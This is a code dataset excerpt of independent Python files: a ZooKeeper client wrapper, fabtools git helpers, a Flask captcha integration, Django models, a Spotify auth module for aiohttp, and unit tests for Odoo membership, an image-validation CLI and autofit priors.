id (stringlengths 1-7) | text (stringlengths 6-1.03M) | dataset_id (stringclasses 1)
---|---|---|
1732048
|
import json
from kazoo.client import KazooClient
from .base import WatchableBase, WatcherBase
class ZooKeeper(WatchableBase):
'''A zookeeper client wrapper. Improves usability especially for watcher callbacks.'''
def __init__(self, *hosts):
self._client = KazooClient(','.join(hosts), read_only=True)
self._started = False
@property
def client(self):
if not self._started:
self._start()
return self._client
def _start(self):
self._client.start()
self._started = True
def get_node(self, name):
data, stat = self.client.get(name)
return json.loads(data) if data != 'false' else {}
def get_children(self, name):
return self.client.get_children(name)
def watch_node(self, name, callback):
return KazooWatcher(self.client.DataWatch(name, func=callback))
def watch_children(self, name, callback):
return KazooWatcher(self.client.ChildrenWatch(name, func=callback))
def watch_all(self, name, callback):
        '''callback should accept a single param, children, which will be a
        dict mapping each child name to that child node's data.
'''
def on_children_change(children):
nodes = {child: self.get_node(node_join(name, child)) for child in children}
callback(nodes)
# This is kind of dumb for now, but basically we want to conform the
# callback signature to a single list of children.
def on_node_change(data, stat):
# TODO: perhaps some sort of cache here? Otherwise we call
# get_node() a lot...
# We don't care about the individual change, just get all configs
# as they are presently.
nodes = {child: self.get_node(node_join(name, child)) for child in self.get_children(name)}
callback(nodes)
# Setup child watcher with our own callback which gets updated node
# values.
watches = [self.watch_children(name, on_children_change)]
# TODO: This might be problematic, because it's going to make new node
# watchers every time the list gets refreshed. Maybe need to keep
# state so we don't create a ton of objects?
for child in self.get_children(name):
watches.append(self.watch_node(node_join(name, child), on_node_change))
return KazooWatcher(*watches)
class KazooWatcher(WatcherBase):
def __init__(self, *watches):
self._watches = watches
def stop(self):
for watch in self._watches:
            watch._stopped = True
def node_join(*names):
return '/'.join(name.rstrip('/') for name in names)
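
# Usage sketch (illustrative, not part of the original module). Assumes a
# reachable ZooKeeper ensemble whose child nodes hold JSON-encoded data; the
# host strings, the '/services/config' path and the callback are hypothetical.
def _example_watch_all():
    def on_configs(nodes):
        # `nodes` maps each child name to its decoded JSON payload
        print('current configs:', nodes)

    zk = ZooKeeper('zk1:2181', 'zk2:2181')
    watcher = zk.watch_all('/services/config', on_configs)
    # ... later, stop delivering callbacks
    watcher.stop()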
|
StarcoderdataPython
|
1625881
|
<reponame>return1/fabtools
"""
Git
===
This module provides high-level tools for managing `Git`_ repositories.
.. _Git: http://git-scm.com/
"""
from __future__ import with_statement
from fabric.api import run
from fabtools import git
from fabtools.files import is_dir
def command():
"""
Require the git command-line tool.
Example::
from fabric.api import run
from fabtools import require
require.git.command()
run('git --help')
"""
from fabtools.require.deb import package as require_deb_package
from fabtools.require.rpm import package as require_rpm_package
from fabtools.system import distrib_family
res = run('git --version', quiet=True)
if res.failed:
family = distrib_family()
if family == 'debian':
require_deb_package('git-core')
elif family == 'redhat':
require_rpm_package('git')
else:
raise NotImplementedError()
def working_copy(remote_url, path=None, branch="master", update=True,
use_sudo=False, user=None):
"""
Require a working copy of the repository from the ``remote_url``.
The ``path`` is optional, and defaults to the last segment of the
remote repository URL, without its ``.git`` suffix.
If the ``path`` does not exist, this will clone the remote
repository and check out the specified branch.
If the ``path`` exists and ``update`` is ``True``, it will fetch
changes from the remote repository, check out the specified branch,
then merge the remote changes into the working copy.
If the ``path`` exists and ``update`` is ``False``, it will only
check out the specified branch, without fetching remote changesets.
:param remote_url: URL of the remote repository (e.g.
https://github.com/ronnix/fabtools.git). The given URL
will be the ``origin`` remote of the working copy.
:type remote_url: str
:param path: Absolute or relative path of the working copy on the
filesystem. If this directory doesn't exist yet, a new
working copy is created through ``git clone``. If the
directory does exist *and* ``update == True``, a
``git fetch`` is issued. If ``path is None`` the
``git clone`` is issued in the current working directory and
the directory name of the working copy is created by ``git``.
:type path: str
:param branch: Branch to check out.
:type branch: str
:param update: Whether or not to fetch and merge remote changesets.
:type update: bool
:param use_sudo: If ``True`` execute ``git`` with
:func:`fabric.operations.sudo`, else with
:func:`fabric.operations.run`.
:type use_sudo: bool
:param user: If ``use_sudo is True``, run :func:`fabric.operations.sudo`
with the given user. If ``use_sudo is False`` this parameter
has no effect.
:type user: str
"""
command()
if path is None:
        path = remote_url.split('/')[-1]
        if path.endswith('.git'):
            path = path[:-len('.git')]
if is_dir(path, use_sudo=use_sudo) and update:
git.fetch(path=path, use_sudo=use_sudo, user=user)
git.checkout(path=path, branch=branch, use_sudo=use_sudo, user=user)
git.pull(path=path, use_sudo=use_sudo, user=user)
elif is_dir(path, use_sudo=use_sudo) and not update:
git.checkout(path=path, branch=branch, use_sudo=use_sudo, user=user)
elif not is_dir(path, use_sudo=use_sudo):
git.clone(remote_url, path=path, use_sudo=use_sudo, user=user)
git.checkout(path=path, branch=branch, use_sudo=use_sudo, user=user)
else:
raise ValueError("Invalid combination of parameters.")
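
# Usage sketch (illustrative, not part of fabtools). Typically called from a
# fabfile task; the target path is a hypothetical placeholder.
def _example_working_copy():
    # Clone the repository on first run, then fetch/checkout/merge on later runs
    working_copy(
        'https://github.com/ronnix/fabtools.git',
        path='/tmp/fabtools',
        branch='master',
        update=True,
    )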
|
StarcoderdataPython
|
1603532
|
"""
The new xCaptcha implementation for Flask without Flask-WTF
"""
__NAME__ = "Flask-xCaptcha"
__version__ = "0.5.2"
__license__ = "MIT"
__author__ = "<NAME>"
__copyright__ = "(c) 2020 <NAME>"
try:
from flask import request
from jinja2 import Markup
import requests
except ImportError as ex:
print("Missing dependencies")
class DEFAULTS(object):
IS_ENABLED = True
THEME = "light"
TYPE = "image"
SIZE = "normal"
TABINDEX = 0
VERIFY_URL = "https://www.google.com/recaptcha/api/siteverify"
API_URL = "//www.google.com/recaptcha/api.js"
DIV_CLASS = "g-recaptcha"
class XCaptcha(object):
def __init__(self,
app=None,
site_key=None,
secret_key=None,
is_enabled=DEFAULTS.IS_ENABLED,
theme=DEFAULTS.THEME,
xtype=DEFAULTS.TYPE,
size=DEFAULTS.SIZE,
tabindex=DEFAULTS.TABINDEX,
verify_url=DEFAULTS.VERIFY_URL,
api_url=DEFAULTS.API_URL,
div_class=DEFAULTS.DIV_CLASS,
**kwargs
):
if app is not None:
self.site_key = app.config.get("XCAPTCHA_SITE_KEY", site_key)
self.secret_key = app.config.get('XCAPTCHA_SECRET_KEY', secret_key)
self.is_enabled = app.config.get("XCAPTCHA_ENABLED", is_enabled)
self.theme = app.config.get("XCAPTCHA_THEME", theme)
self.type = app.config.get("XCAPTCHA_TYPE", xtype)
self.size = app.config.get("XCAPTCHA_SIZE", size)
self.tabindex = app.config.get("XCAPTCHA_TABINDEX", tabindex)
self.verify_url = app.config.get("XCAPTCHA_VERIFY_URL", verify_url)
self.api_url = app.config.get("XCAPTCHA_API_URL", api_url)
self.div_class = app.config.get("XCAPTCHA_DIV_CLASS", div_class)
@app.context_processor
def get_code():
return dict(xcaptcha=Markup(self.get_code()))
elif site_key is not None:
self.site_key = site_key
self.secret_key = secret_key
self.is_enabled = is_enabled
self.theme = theme
self.type = xtype
self.size = size
self.tabindex = tabindex
self.verify_url = verify_url
self.api_url = api_url
self.div_class = div_class
def get_code(self):
"""
Returns the new XCaptcha code
:return:
"""
return "" if not self.is_enabled else ("""
<script src='{API_URL}'></script>
<div class="{DIV_CLASS}" data-sitekey="{SITE_KEY}" data-theme="{THEME}" data-type="{TYPE}" data-size="{SIZE}"\
data-tabindex="{TABINDEX}"></div>
""".format(
DIV_CLASS=self.div_class,
API_URL=self.api_url,
SITE_KEY=self.site_key,
THEME=self.theme,
TYPE=self.type,
SIZE=self.size,
TABINDEX=self.tabindex
)
)
def verify(self, response=None, remote_ip=None):
if self.is_enabled:
data = {
"secret": self.secret_key,
"response": response or request.form.get('{}-response'.format(self.div_class)),
"remoteip": remote_ip or request.environ.get('REMOTE_ADDR')
}
r = requests.get(self.verify_url, params=data)
return r.json()["success"] if r.status_code == 200 else False
return True
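
# Usage sketch (illustrative, not part of this package). Shows one way the
# XCaptcha helper could be wired into a Flask app; the config key values and
# the '/submit' route are hypothetical placeholders.
def _example_app():
    from flask import Flask
    app = Flask(__name__)
    app.config['XCAPTCHA_SITE_KEY'] = 'your-site-key'
    app.config['XCAPTCHA_SECRET_KEY'] = 'your-secret-key'
    xcaptcha = XCaptcha(app=app)

    @app.route('/submit', methods=['POST'])
    def submit():
        # verify() reads the widget response from the posted form data
        if xcaptcha.verify():
            return 'ok'
        return 'captcha failed', 400

    return app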
|
StarcoderdataPython
|
3330231
|
<reponame>tallninja/python_blockchain<gh_stars>1-10
import time
from backend.blockchain.blockchain import Blockchain
from backend.config import TIME_S
blockchain = Blockchain()
times = []
for i in range(1000):
start_time = time.time_ns() / TIME_S
blockchain.add_block(i)
end_time = time.time_ns() / TIME_S
mine_time = end_time - start_time
times.append(mine_time)
average_time = sum(times) / len(times)
print(f"Block No: {i}")
print(f"last_block_difficulty: {blockchain.chain[-1].difficulty}")
print(f"last_block_nonce: {blockchain.chain[-1].nonce}")
print(f"last_block_hash: {blockchain.chain[-1].hash}")
print(f"Time to mine block: {mine_time} seconds")
print(f"Average_time: {average_time} seconds\n\n")
|
StarcoderdataPython
|
1725451
|
<gh_stars>1-10
from dataclasses import dataclass
from typing import List
from lakey_finicity.models import Customer
# https://community.finicity.com/s/article/201703219-Customers#get_customers
@dataclass
class CustomersListResponse(object):
found: int # Total number of records matching search criteria
    displaying: int # Number of records in this response
    moreAvailable: bool # True if this response does not contain the last record in the result set
customers: List[Customer]
_unused_fields: dict # this is for forward compatibility and should be empty
@staticmethod
def from_dict(data: dict):
data = dict(data) # don't mutate the original
found = data.pop('found')
displaying = data.pop('displaying')
moreAvailable = data.pop('moreAvailable')
customers_raw = data.pop('customers')
customers = [Customer.from_dict(d) for d in customers_raw]
return CustomersListResponse(
found=found,
displaying=displaying,
moreAvailable=moreAvailable,
customers=customers,
_unused_fields=data,
)
|
StarcoderdataPython
|
3286777
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.core.exceptions import ObjectDoesNotExist
class Interest(models.Model):
interest = models.CharField(max_length=150)
def __str__(self):
return self.interest
class Profile(models.Model):
"""Extension of User model with one-to-one link."""
user = models.OneToOneField(User, related_name='profile', on_delete=models.CASCADE)
line = models.CharField(max_length=150)
bio = models.TextField(max_length=300)
age = models.PositiveIntegerField(default=18)
contactInfo = models.CharField(max_length=200)
profilePhotoLink = models.URLField(max_length=200, blank=True)
interests = models.ManyToManyField(Interest, related_name='profile')
@receiver(post_save, sender=User)
def create_save_user_profile(sender, instance, created, **kwargs):
try:
instance.profile.save()
except ObjectDoesNotExist:
Profile.objects.create(user=instance)
def __str__(self):
return self.user.username
class Request(models.Model):
"""A conversation request that one user sends to another."""
sender = models.ForeignKey(User, related_name='request_sender', on_delete=models.CASCADE)
receiver = models.ForeignKey(User, related_name='request_receiver', on_delete=models.CASCADE)
PENDING = 0
PASSED = 1
STATUS_CHOICES = (
(PENDING, "pending"),
(PASSED, "passed"),
)
status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES)
def __str__(self):
return "request from " + self.sender.first_name + " to " + self.receiver.first_name
class Match(models.Model):
"""A conversation match between two users who want to talk to each other."""
userA = models.ForeignKey(User, related_name='match_user_A', on_delete=models.CASCADE, null=True)
friendA = models.ForeignKey(User, related_name='match_friend_A', on_delete=models.CASCADE, null=True)
userB = models.ForeignKey(User, related_name='match_user_B', on_delete=models.CASCADE, null=True)
friendB = models.ForeignKey(User, related_name='match_friend_B', on_delete=models.CASCADE, null=True)
def __str__(self):
return "match between " + self.userA.first_name + " and " + self.friendA.first_name
|
StarcoderdataPython
|
1763338
|
<filename>src/spotify_party/auth.py
__all__ = ["require_auth", "handle_auth", "update_auth", "call_api"]
import time
from functools import partial, wraps
from typing import TYPE_CHECKING, Any, Awaitable, Callable, Optional, Tuple
import aiohttp_session
from aiohttp import web
from aiohttp_spotify import SpotifyAuth, SpotifyResponse
if TYPE_CHECKING:
from .data_model import User # NOQA
def require_auth(
original_handler: Optional[
Callable[[web.Request, "User"], Awaitable]
] = None,
*,
redirect: bool = True,
admin: bool = False,
) -> Callable[..., Any]:
"""A decorator requiring that the user is authenticated to see a view
Args:
        redirect (bool, optional): If True, the user will be redirected to the
            login page. Otherwise, a :class:`HTTPUnauthorized` error is raised.
        admin (bool, optional): If True, additionally require that the user is
            listed in the app's ``admins`` config; otherwise a 404 is returned.
"""
if original_handler is None:
return partial(_require_auth, redirect=redirect, admin=admin)
return _require_auth(original_handler, redirect=redirect, admin=admin)
def _require_auth(
handler: Callable[[web.Request, "User"], Awaitable],
*,
redirect: bool = True,
admin: bool = False,
) -> Callable[[web.Request], Awaitable]:
"""This does the heavy lifting for the authorization check"""
@wraps(handler)
async def wrapped(request: web.Request) -> web.Response:
session = await aiohttp_session.get_session(request)
user_id = session.get("sp_user_id")
user = await request.config_dict["db"].get_user(user_id)
if user is None:
if admin:
return web.HTTPNotFound()
if not redirect:
raise web.HTTPUnauthorized()
raise web.HTTPTemporaryRedirect(
location=request.config_dict["spotify_app"]
.router["auth"]
.url_for()
.with_query(redirect=request.url.path)
)
if admin and user.user_id not in request.app["config"]["admins"]:
return web.HTTPNotFound()
async with user:
await user.update_auth(request)
return await handler(request, user)
return wrapped
async def handle_auth(request: web.Request, auth: SpotifyAuth) -> None:
"""This will be called at the end of the initial OAuth dance"""
response = await request.app["spotify_client"].request(
request.config_dict["client_session"], auth, "/me"
)
if response.status != 200:
raise web.HTTPInternalServerError()
user_info = response.json()
if user_info.get("product", "free") != "premium":
raise web.HTTPTemporaryRedirect(
location=request.app["main_app"].router["premium"].url_for()
)
user = await request.config_dict["db"].add_user(
user_info["id"], user_info["display_name"], response.auth
)
session = await aiohttp_session.get_session(request)
session["sp_user_id"] = user.user_id
async def update_auth(
request: web.Request, auth: SpotifyAuth
) -> Tuple[bool, SpotifyAuth]:
auth_changed = False
if auth.expires_at - time.time() <= 600: # 10 minutes
auth_changed = True
auth = await request.config_dict["spotify_app"][
"spotify_client"
].update_auth(request.config_dict["client_session"], auth)
return auth_changed, auth
async def call_api(
request: web.Request,
user: Optional["User"],
endpoint: str,
*,
method: str = "GET",
**kwargs,
) -> Optional[SpotifyResponse]:
"""Call the Spotify API
Args:
request (web.Request): The current request
user (Optional[User]): The current user (this call will fail
without one)
endpoint (str): The API path
method (str, optional): The HTTP request method. Defaults to "GET".
Returns:
Optional[SpotifyResponse]: The response from the API
"""
if user is None:
return None
response = await request.config_dict["spotify_app"][
"spotify_client"
].request(
request.config_dict["client_session"],
user.auth,
endpoint,
method=method,
**kwargs,
)
# Update the authentication info if required
if response.auth_changed:
user.auth = response.auth
return response
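
# Usage sketch (illustrative, not part of this module). A hypothetical aiohttp
# view protected by the require_auth decorator defined above.
@require_auth
async def example_index(request: web.Request, user: "User") -> web.Response:
    # `user` is the authenticated user resolved from the session by the decorator
    return web.Response(text=f"Hello, {user.user_id}")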
|
StarcoderdataPython
|
29574
|
import unittest
import io
from unittest import mock
from tests.lib.utils import INSPECT
from custom_image_cli.validation_tool import validation_helper
from custom_image_cli.validation_tool.validation_models.validation_models import \
ImageDetail, ImageManifest, EmrRelease
class TestValidationHelper(unittest.TestCase):
def setUp(self) -> None:
self.inspect = INSPECT
self.manifest = ImageManifest([EmrRelease("release_name", [ImageDetail("image_type", None, [], [])])], [], [])
@mock.patch('sys.stdout', new_callable=io.StringIO)
@mock.patch('custom_image_cli.validation_tool.validation_helper.load_validation_info')
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_local_job_run.CheckLocalJobRun.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_manifest.CheckManifest.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_manifest.CheckManifest.__init__")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_files.CheckFiles.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_files.CheckFiles.__init__")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_envs.CheckEnvs.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_envs.CheckEnvs.__init__")
def test_validate_all(self, check_envs_constructor, check_envs, check_files_constructor,
check_files, check_manifest_constructor,
check_manifest, check_local_job_run, load_info, mock_stdout):
check_envs_constructor.return_value = None
check_envs.return_value = True
check_files_constructor.return_value = None
check_files.return_value = True
check_manifest_constructor.return_value = None
check_manifest.return_value = True
check_local_job_run.return_value = True
load_info.return_value = ImageDetail("image_type", None, [], []), [], []
actual = validation_helper.validate_all(self.inspect, "docker_cmd", "docker_image_uri",
self.manifest, "release_name", "image_type", "log")
self.assertEqual(actual, True)
check_manifest.assert_called_once()
check_envs.assert_called_once()
check_files.assert_called_once()
check_local_job_run.assert_called_once()
expected = "... Checking Image Manifest\n"
self.assertEqual(expected, mock_stdout.getvalue())
@mock.patch("custom_image_cli.validation_tool.check_inputs.check_version")
@mock.patch("custom_image_cli.validation_tool.check_inputs.check_image")
def test_load_validation_info(self, check_image, check_version):
value = self.manifest
check_version.return_value = None
check_image.return_value = None
actual_img, actual_file, actual_env = validation_helper.load_validation_info(self.manifest, "release_name", "image_type", "log")
self.assertEqual(actual_img, self.manifest.emr_releases[0].images[0])
self.assertEqual(actual_file, [])
self.assertEqual(actual_env, [])
check_version.assert_called_once_with(self.manifest.emr_releases[0], "release_name", "log")
check_image.assert_called_once_with(self.manifest.emr_releases[0].images[0], "image_type", "log")
|
StarcoderdataPython
|
3251090
|
# -*- coding: utf-8 -*-
import datetime
from dateutil.relativedelta import relativedelta
from unittest.mock import patch
import time
from odoo.addons.membership.tests.common import TestMembershipCommon
from odoo.tests import tagged
from odoo import fields
@tagged('post_install', '-at_install')
class TestMembership(TestMembershipCommon):
def test_none_membership(self):
self.membership_1.write({
'membership_date_from': datetime.date.today() + relativedelta(years=-2),
'membership_date_to': datetime.date.today() + relativedelta(years=-1),
})
self.partner_1.create_membership_invoice(self.membership_1, 75.0)
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: outdated non paid subscription should keep in non-member state')
def test_old_membership(self):
self.membership_1.write({
'membership_date_from': datetime.date.today() + relativedelta(years=-2),
'membership_date_to': datetime.date.today() + relativedelta(years=-1),
})
self.partner_1.create_membership_invoice(self.membership_1, 75.0)
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: outdated non paid subscription should keep in non-member state')
# subscribes to a membership
self.partner_1.create_membership_invoice(self.membership_1, 75.0)
# checks for invoices
invoice = self.env['account.move'].search([('partner_id', '=', self.partner_1.id)], limit=1)
self.assertEqual(
invoice.state, 'draft',
'membership: new subscription should create a draft invoice')
self.assertEqual(
invoice.invoice_line_ids[0].product_id, self.membership_1,
'membership: new subscription should create a line with the membership as product')
self.assertEqual(
invoice.invoice_line_ids[0].price_unit, 75.0,
'membership: new subscription should create a line with the given price instead of product price')
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: old membership unpaid should be in non-member state')
# the invoice is open -> customer goes to invoiced status
invoice.action_post()
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: after opening the invoice for old membership, it should remain in non paid status')
# payment process
payment = self.env['account.payment'].create({
'payment_date': time.strftime('%Y-%m-%d'),
'journal_id': self.env['account.journal'].search([], limit=1).id,
'payment_method_id': self.env['account.payment.method'].search([], limit=1).id,
'payment_type': 'inbound',
'partner_type': 'customer',
'partner_id': invoice.partner_id.id,
'amount': 500,
'company_id': self.env.company.id,
'currency_id': self.env.company.currency_id.id,
})
payment.post()
inv1_receivable = invoice.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
pay_receivable = payment.move_line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
(inv1_receivable + pay_receivable).reconcile()
# the invoice is paid -> customer goes to paid status
self.assertEqual(
self.partner_1.membership_state, 'old',
'membership: after paying the invoice, customer should be in old status')
# check second partner then associate them
self.assertEqual(
self.partner_2.membership_state, 'free',
'membership: free member customer should be in free state')
self.partner_2.write({'free_member': False, 'associate_member': self.partner_1.id})
self.assertEqual(
self.partner_2.membership_state, 'old',
'membership: associated customer should be in old state')
def test_paid_membership(self):
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: default membership status of partners should be None')
# subscribes to a membership
invoice = self.partner_1.create_membership_invoice(self.membership_1, 75.0)
self.assertEqual(
invoice.state, 'draft',
'membership: new subscription should create a draft invoice')
self.assertEqual(
invoice.invoice_line_ids[0].product_id, self.membership_1,
'membership: new subscription should create a line with the membership as product')
self.assertEqual(
invoice.invoice_line_ids[0].price_unit, 75.0,
'membership: new subscription should create a line with the given price instead of product price')
self.assertEqual(
self.partner_1.membership_state, 'waiting',
'membership: new membership should be in waiting state')
# the invoice is open -> customer goes to invoiced status
invoice.post()
self.assertEqual(
self.partner_1.membership_state, 'invoiced',
'membership: after opening the invoice, customer should be in invoiced status')
# the invoice is paid -> customer goes to paid status
bank_journal = self.env['account.journal'].create({'name': 'Bank', 'type': 'bank', 'code': 'BNK67'})
self.env['account.payment'].create({
'payment_method_id': self.env.ref("account.account_payment_method_manual_in").id,
'payment_type': 'inbound',
'invoice_ids': [(6, False, invoice.ids)],
'amount': 86.25,
'journal_id': bank_journal.id,
'partner_type': 'customer',
}).post()
self.assertEqual(
self.partner_1.membership_state, 'paid',
'membership: after paying the invoice, customer should be in paid status')
# check second partner then associate them
self.assertEqual(
self.partner_2.membership_state, 'free',
'membership: free member customer should be in free state')
self.partner_2.write({'free_member': False, 'associate_member': self.partner_1.id})
self.assertEqual(
self.partner_2.membership_state, 'paid',
'membership: associated customer should be in paid state')
def test_cancel_membership(self):
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: default membership status of partners should be None')
# subscribes to a membership
invoice = self.partner_1.create_membership_invoice(self.membership_1, 75.0)
def patched_today(*args, **kwargs):
return fields.Date.to_date('2019-01-01')
with patch.object(fields.Date, 'today', patched_today):
invoice.button_cancel()
self.partner_1._compute_membership_state()
self.assertEqual(invoice.state, 'cancel')
self.assertEqual(self.partner_1.membership_state, 'canceled')
|
StarcoderdataPython
|
3235706
|
<gh_stars>0
import math
import pytest
import autofit as af
from autofit import exc
class TestPriorLimits:
def test_out_of_order_prior_limits(self):
with pytest.raises(af.exc.PriorException):
af.UniformPrior(1.0, 0)
with pytest.raises(af.exc.PriorException):
af.GaussianPrior(0, 1, 1, 0)
def test_in_or_out(self):
prior = af.GaussianPrior(0, 1, 0, 1)
with pytest.raises(af.exc.PriorLimitException):
prior.assert_within_limits(-1)
with pytest.raises(af.exc.PriorLimitException):
prior.assert_within_limits(1.1)
prior.assert_within_limits(0.0)
prior.assert_within_limits(0.5)
prior.assert_within_limits(1.0)
def test_no_limits(self):
prior = af.GaussianPrior(0, 1)
prior.assert_within_limits(100)
prior.assert_within_limits(-100)
prior.assert_within_limits(0)
prior.assert_within_limits(0.5)
def test_uniform_prior(self):
prior = af.UniformPrior(0, 1)
with pytest.raises(af.exc.PriorLimitException):
prior.assert_within_limits(-1)
with pytest.raises(af.exc.PriorLimitException):
prior.assert_within_limits(1.1)
prior.assert_within_limits(0.0)
prior.assert_within_limits(0.5)
prior.assert_within_limits(1.0)
def test_prior_creation(self):
mapper = af.ModelMapper()
mapper.component = af.m.MockClassx2
prior_tuples = mapper.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.lower_limit == 0
assert prior_tuples[0].prior.upper_limit == 1
assert prior_tuples[1].prior.lower_limit == 0
assert prior_tuples[1].prior.upper_limit == 2
def test_out_of_limits(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
assert mm.instance_from_vector([1, 2]) is not None
with pytest.raises(af.exc.PriorLimitException):
mm.instance_from_vector(([1, 3]))
with pytest.raises(af.exc.PriorLimitException):
mm.instance_from_vector(([-1, 2]))
def test_inf(self):
mm = af.ModelMapper()
mm.mock_class_inf = af.m.MockClassInf
prior_tuples = mm.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.lower_limit == float("-inf")
assert prior_tuples[0].prior.upper_limit == 0
assert prior_tuples[1].prior.lower_limit == 0
assert prior_tuples[1].prior.upper_limit == float("inf")
assert mm.instance_from_vector([-10000, 10000]) is not None
with pytest.raises(af.exc.PriorLimitException):
mm.instance_from_vector(([1, 0]))
with pytest.raises(af.exc.PriorLimitException):
mm.instance_from_vector(([0, -1]))
def test_preserve_limits_tuples(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
new_mapper = mm.mapper_from_gaussian_tuples(
tuples=[(0.0, 0.5), (0.0, 1)], use_widths=True, use_errors=True
)
prior_tuples = new_mapper.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.lower_limit == 0
assert prior_tuples[0].prior.upper_limit == 1
assert prior_tuples[1].prior.lower_limit == 0
assert prior_tuples[1].prior.upper_limit == 2
def test__only_use_passed_errors_to_set_up_gaussian_prior(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
new_mapper = mm.mapper_from_gaussian_tuples(
tuples=[(0.1, 0.2), (0.3, 0.4)], use_widths=False, use_errors=True
)
prior_tuples = new_mapper.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.mean == 0.1
assert prior_tuples[0].prior.sigma == 0.2
assert prior_tuples[1].prior.mean == 0.3
assert prior_tuples[1].prior.sigma == 0.4
def test__only_use_widths_to_pass_priors(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
new_mapper = mm.mapper_from_gaussian_tuples(
tuples=[(5.0, 5.0), (5.0, 5.0)], use_widths=True, use_errors=False
)
prior_tuples = new_mapper.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.mean == 5.0
assert prior_tuples[0].prior.sigma == 1.0
assert prior_tuples[1].prior.mean == 5.0
assert prior_tuples[1].prior.sigma == 2.0
def test__use_max_of_widths_and_passed_errors_to_pass_priors(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
new_mapper = mm.mapper_from_gaussian_tuples(
tuples=[(5.0, 0.2), (5.0, 5.0)], use_widths=True, use_errors=True
)
prior_tuples = new_mapper.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.mean == 5.0
assert prior_tuples[0].prior.sigma == 1.0
assert prior_tuples[1].prior.mean == 5.0
assert prior_tuples[1].prior.sigma == 5.0
def test_from_gaussian_no_limits(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
new_mapper = mm.mapper_from_gaussian_tuples(
[(0.0, 0.5), (0.0, 1)], no_limits=True
)
priors = new_mapper.priors
assert priors[0].lower_limit == float("-inf")
assert priors[0].upper_limit == float("inf")
assert priors[1].lower_limit == float("-inf")
assert priors[1].upper_limit == float("inf")
class TestPriorMean:
def test_simple(self):
uniform_prior = af.UniformPrior(0.0, 1.0)
assert uniform_prior.mean == 0.5
def test_higher(self):
uniform_prior = af.UniformPrior(1.0, 2.0)
assert uniform_prior.mean == 1.5
class TestAddition:
def test_abstract_plus_abstract(self):
one = af.AbstractModel()
two = af.AbstractModel()
one.a = "a"
two.b = "b"
three = one + two
assert three.a == "a"
assert three.b == "b"
def test_list_properties(self):
one = af.AbstractModel()
two = af.AbstractModel()
one.a = ["a"]
two.a = ["b"]
three = one + two
assert three.a == ["a", "b"]
def test_instance_plus_instance(self):
one = af.ModelInstance()
two = af.ModelInstance()
one.a = "a"
two.b = "b"
three = one + two
assert three.a == "a"
assert three.b == "b"
def test_mapper_plus_mapper(self):
one = af.ModelMapper()
two = af.ModelMapper()
one.a = af.PriorModel(af.m.MockClassx2)
two.b = af.PriorModel(af.m.MockClassx2)
three = one + two
assert three.prior_count == 4
class TestUniformPrior:
def test__simple_assumptions(self):
uniform_simple = af.UniformPrior(lower_limit=0.0, upper_limit=1.0)
assert uniform_simple.value_for(0.0) == 0.0
assert uniform_simple.value_for(1.0) == 1.0
assert uniform_simple.value_for(0.5) == 0.5
def test__non_zero_lower_limit(self):
uniform_half = af.UniformPrior(lower_limit=0.5, upper_limit=1.0)
assert uniform_half.value_for(0.0) == 0.5
assert uniform_half.value_for(1.0) == 1.0
assert uniform_half.value_for(0.5) == 0.75
def test_width(self):
assert af.UniformPrior(2, 5).width == 3
def test_negative_range(self):
prior = af.UniformPrior(-1, 0)
assert prior.width == 1
assert prior.value_for(0.0) == -1
assert prior.value_for(1.0) == 0.0
def test__log_prior_from_value(self):
gaussian_simple = af.UniformPrior(lower_limit=-40, upper_limit=70)
log_prior = gaussian_simple.log_prior_from_value(value=0.0)
assert log_prior == 0.0
log_prior = gaussian_simple.log_prior_from_value(value=11.0)
assert log_prior == 0.0
class TestLogUniformPrior:
def test__simple_assumptions(self):
log_uniform_simple = af.LogUniformPrior(lower_limit=1.0e-8, upper_limit=1.0)
assert log_uniform_simple.value_for(0.0) == 1.0e-8
assert log_uniform_simple.value_for(1.0) == 1.0
assert log_uniform_simple.value_for(0.5) == pytest.approx(0.0001, abs=0.000001)
def test__non_zero_lower_limit(self):
log_uniform_half = af.LogUniformPrior(lower_limit=0.5, upper_limit=1.0)
assert log_uniform_half.value_for(0.0) == 0.5
assert log_uniform_half.value_for(1.0) == 1.0
assert log_uniform_half.value_for(0.5) == pytest.approx(0.70710678118, 1.0e-4)
def test__log_prior_from_value(self):
gaussian_simple = af.LogUniformPrior(lower_limit=1e-8, upper_limit=1.0)
log_prior = gaussian_simple.log_prior_from_value(value=1.0)
assert log_prior == 1.0
log_prior = gaussian_simple.log_prior_from_value(value=2.0)
assert log_prior == 0.5
log_prior = gaussian_simple.log_prior_from_value(value=4.0)
assert log_prior == 0.25
gaussian_simple = af.LogUniformPrior(lower_limit=50.0, upper_limit=100.0)
log_prior = gaussian_simple.log_prior_from_value(value=1.0)
assert log_prior == 1.0
log_prior = gaussian_simple.log_prior_from_value(value=2.0)
assert log_prior == 0.5
log_prior = gaussian_simple.log_prior_from_value(value=4.0)
assert log_prior == 0.25
